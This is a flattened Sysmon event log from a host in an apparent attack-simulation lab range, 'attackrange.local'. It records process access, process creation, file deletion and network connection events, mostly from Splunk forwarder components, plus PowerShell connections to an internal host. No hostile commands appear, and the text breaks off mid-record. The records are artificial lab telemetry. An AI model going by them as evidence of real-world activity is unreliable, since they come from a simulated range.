21:51:26.827{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.827{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.827{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.827{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.827{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-81DE-613A-9C96-03000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.827{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81DE-613A-9C96-03000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.812{B81B27B7-81DE-613A-9C96-03000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.646{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=003939E03BA5971E34BB53E359FA36C7,SHA256=A3B430426C29A616A139CF51A6C3BA4373E1BDFDDE612F678F7D6169C66EDFDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.145{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBF60ACF13A81EEAA70B1C78705978E0,SHA256=B755B60886DBEC53AC22AB6C5B62850614899F2CA539DEDDE75A4CAEF5F1DAEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.880{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82F9571A1FC044F599CED6A016E39DB6,SHA256=B68668A4132EEAE655581C3A9C25E1CA169E7B561444160152C639F8DB15EE4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.880{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF269E6E9BF4AD29856E82F4F0F9C767,SHA256=1BDDACA5A4C1F0E2475F24FDDA6E7384E89F2BDFB4094E12AC054992883D5D78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.427{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81DF-613A-9D96-03000000C801}5940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.427{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.427{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.427{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.427{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.427{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-81DF-613A-9D96-03000000C801}5940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.427{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81DF-613A-9D96-03000000C801}5940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.413{B81B27B7-81DF-613A-9D96-03000000C801}5940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.165{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51DAF7D885FD24CAB6F8C1D241063322,SHA256=9419830F1DEF5D4496769D3C5EBBED68A66EADF542830A87BD275CC14B9A4E90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:51.654{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61972-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:28.211{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EB74EA637DE0E1819F6AF7FC1B57166,SHA256=68ECC7D7E65F3D3E924D99F733D70F1187738085041898AE3BC47A28704BC068,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:29.225{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BDC269B59B3108906872E77D3909458,SHA256=2AD188C95449431B17C25C2E93CAF692858D3EDC0E84E8B861A480DFB3552A96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:30.511{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=677A854EBA38D241602F8EC17B6CA4FC,SHA256=846C341CC0A04A2F4CA72B64EC014E8ECF214559F5FADFDA2DD6955B5B5C6031,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:30.243{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B43603319E0868D887F04DBDE4F81D0,SHA256=3E0FC181C1B34106A5AC01B73C299CAB10BCB08D80F0ECF55D1257186C4EA01D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:54.322{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61973-false10.0.1.12-8000- 23542300x800000000000000035127032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:31.263{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C018FC10AE6660195768C7EC76F926D,SHA256=CCB29CF457193DC098D1BEF98177FDD6D8643A4C7EC1AE44F2E6EE228EBC5131,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:55.655{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61974-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:32.762{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF72499410.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:32.278{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48BFA9301FBDCF68D25EC388B1AF4042,SHA256=BD85CB29B337D8C2EA67715923C9CB58C9ED4A207F1652A12E6481A401D64E68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:33.342{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C670A965627811DCB240FD7E4D417B9C,SHA256=C3CB5BEC38A6530096F51895E582151076FCAD1A7C057EB5FCE0F475E933040E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:34.707{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0F3C9B9CC140BBEA1894FE9D999659C0,SHA256=6C7417992C4A26F0FBB9B2D5D2941655DE2CA08AB7C6B3941D417F152D107ABB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:34.376{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D403B96932E942728D53C1A5D5C8021,SHA256=C01E62955FCF0834DEC875D6659EF091B352C0FE3043AE3407B2E85D44F9850E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:35.378{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C018BFD1C60B7F73BEF53421CD7913DF,SHA256=4E5D72EC544BE6F1051772FD6B9C4197716BD7B0B9A9B10BB3765CB97B2CC602,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:59.669{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61975-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:36.393{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0ED3FC9C77502559A1CCA3552D2B7CF,SHA256=26A7E1483A198846AE26AF8B94859F00712E0BB251A17A4A0011FA04D62E2BBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.253{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61976-false10.0.1.12-8000- 23542300x800000000000000035127043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:37.961{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C613B413CD07316ED37F0CFA3F0BA6E2,SHA256=E1A1303D52C038E3A67D9D48EEF2706EBD9B093C4D562E798E74909B4C9FEBE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:37.423{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A50B004D919E9A0A36DAEAE35B80DC6,SHA256=62490504415D83E8B3BAC8FEECE24AB4B4B2CC04E224EA246C9C5929D242CA4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:38.441{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 